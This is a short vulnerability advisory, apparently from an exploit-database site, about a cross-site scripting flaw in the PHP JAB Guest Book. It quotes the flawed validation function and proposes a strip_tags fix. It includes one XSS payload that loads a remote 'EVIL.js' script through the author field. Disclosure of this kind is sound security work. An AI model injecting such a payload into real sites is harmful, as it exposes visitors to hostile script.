JAB Guest Book XSS

Advisory Content :

Script Name: JAB Guest Book
Authors: Barnz (at) hotmail.co (dot) uk [email concealed]
Website: James Barnsley
Bug Report: NetJackal (nj[AT]hackerz[DOT]ir & nima_501[AT]yahoo[DOT]com)
Status: Patch not released
First i should apologize for my bad english.
Intro:
JAB Guest Book is a free guest book written in PHP, it works using flat
files
to store data which means no database is needed. Features include easy
installation
and customisation into your existing website. An administration panel which
allows
you to delete posts and ban users, additional administration configuration
to un-ban
users and to use the bad word filter. Ability for users to post messages
with topic,
email and comments including emotions (smilies). The main guest book works
completely
using only one file.
Bugs Description:
look at pbguestbook.php at line 425:

function invalideregtest($input)
{
$checkcount = 0;

//$exinput = str_split($input);

$countname = count($exinput);

for($i=0; $i<$countname; $i++)
{
if(!ereg("[A-Za-z0-9]", $input[$i]) == 1)
{
$checkcount++;
}
}

if($checkcount != 0)
{
$input = "no";
}
else
{
$input = "yes";
}

return($input);
}
$check1 = invalideregtest($topic);

script just check $topic by invalideregtest function. so what's happen if
we put some thing lile
<SCRIPT SRC=http://Hacler/EVIL.js></script> in $author? yes true answer xss
happens

Solution:
Edit the code and check other inputs by invalideregtest function or simply
remove html tags by
strip_tags function (PHP built-in function)

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason